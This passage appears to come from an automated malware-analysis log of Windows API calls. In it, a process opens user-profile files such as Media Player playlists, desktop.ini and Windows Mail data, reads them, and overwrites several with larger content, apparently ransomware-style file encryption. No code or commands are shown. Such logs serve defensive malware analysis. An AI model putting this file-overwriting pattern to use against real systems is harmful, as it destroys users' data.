0x6da [0178.764] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.764] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.764] ReleaseMutex (hMutex=0x168) returned 1 [0178.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0178.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINWORD.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0178.764] ReadFile (in: hFile=0x1f0, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6da, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x311f2bc*=0x6da, lpOverlapped=0x0) returned 1 [0178.765] CloseHandle (hObject=0x1f0) returned 1 [0178.765] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.766] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.766] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6f9b0 [0178.766] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.766] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.766] ReleaseMutex (hMutex=0x168) returned 1 [0178.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x86.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0178.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcredist_x86.exe", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcredist_x86.exe", lpUsedDefaultChar=0x0) returned 16 [0178.766] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0178.766] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6e9b0 [0178.766] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.767] CloseHandle (hObject=0x1f0) returned 1 [0178.767] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.767] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.767] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x23588 [0178.767] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.767] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.767] ReleaseMutex (hMutex=0x168) returned 1 [0178.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0178.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x1f8fc3c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x86.msi", lpUsedDefaultChar=0x0) returned 28 [0178.767] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0178.768] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x22588 [0178.768] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.768] CloseHandle (hObject=0x1f0) returned 1 [0178.768] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.768] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.768] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x25588 [0178.768] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.769] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.769] ReleaseMutex (hMutex=0x168) returned 1 [0178.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0178.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x1f8fc3c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x86.msi", lpUsedDefaultChar=0x0) returned 28 [0178.769] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0178.769] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x24588 [0178.769] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.769] CloseHandle (hObject=0x1f0) returned 1 [0178.770] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.770] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.770] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x23588 [0178.770] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.770] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.770] ReleaseMutex (hMutex=0x168) returned 1 [0178.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0178.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x1f8fc3c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x64.msi", lpUsedDefaultChar=0x0) returned 28 [0178.770] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0178.770] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x22588 [0178.770] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.771] CloseHandle (hObject=0x1f0) returned 1 [0178.771] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.771] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.771] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x23588 [0178.771] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.771] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.771] ReleaseMutex (hMutex=0x168) returned 1 [0178.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0178.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x86.msi", cchWideChar=28, lpMultiByteStr=0x1f8fc3c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x86.msi", lpUsedDefaultChar=0x0) returned 28 [0178.771] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0178.772] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x22588 [0178.772] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.772] CloseHandle (hObject=0x1f0) returned 1 [0178.772] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.773] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.773] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x43 [0178.773] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.773] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.773] ReleaseMutex (hMutex=0x168) returned 1 [0178.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0178.773] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x43, lpOverlapped=0x0) returned 1 [0179.754] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0179.755] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0179.755] CloseHandle (hObject=0x1f0) returned 1 [0179.755] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0179.755] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0179.756] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4f3 [0179.757] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0179.757] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.757] ReleaseMutex (hMutex=0x168) returned 1 [0179.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="03_Music_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0179.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="03_Music_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa53fc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="03_Music_rated_at_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0179.757] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f3be08, nNumberOfBytesToRead=0x4f3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3be08*, lpNumberOfBytesRead=0x311f2bc*=0x4f3, lpOverlapped=0x0) returned 1 [0179.759] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0179.759] WriteFile (in: hFile=0x1f0, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xa7b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x311f2d0*=0xa7b, lpOverlapped=0x0) returned 1 [0179.759] CloseHandle (hObject=0x1f0) returned 1 [0179.759] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0179.760] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0179.760] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x249 [0179.760] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0179.760] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.760] ReleaseMutex (hMutex=0x168) returned 1 [0179.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="11_All_Pictures.wpl", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0179.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="11_All_Pictures.wpl", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="11_All_Pictures.wpl", lpUsedDefaultChar=0x0) returned 19 [0179.761] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x249, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x311f2bc*=0x249, lpOverlapped=0x0) returned 1 [0179.973] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0179.974] WriteFile (in: hFile=0x1f0, lpBuffer=0x2878b08*, nNumberOfBytesToWrite=0x7d1, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesWritten=0x311f2d0*=0x7d1, lpOverlapped=0x0) returned 1 [0179.974] CloseHandle (hObject=0x1f0) returned 1 [0179.974] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0179.975] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0179.976] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x200000 [0179.977] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0179.977] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.977] ReleaseMutex (hMutex=0x168) returned 1 [0179.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edbres00001.jrs", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0179.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edbres00001.jrs", cchWideChar=15, lpMultiByteStr=0x1f732cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edbres00001.jrs", lpUsedDefaultChar=0x0) returned 15 [0179.977] ReadFile (in: hFile=0x1f0, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0179.987] ReadFile (in: hFile=0x1f0, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.988] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1ff000 [0179.988] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.990] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1ff000 [0179.990] WriteFile (in: hFile=0x1f0, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.995] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0179.995] WriteFile (in: hFile=0x1f0, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0179.996] WriteFile (in: hFile=0x1f0, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0179.996] CloseHandle (hObject=0x1f0) returned 1 [0179.996] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0179.998] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: 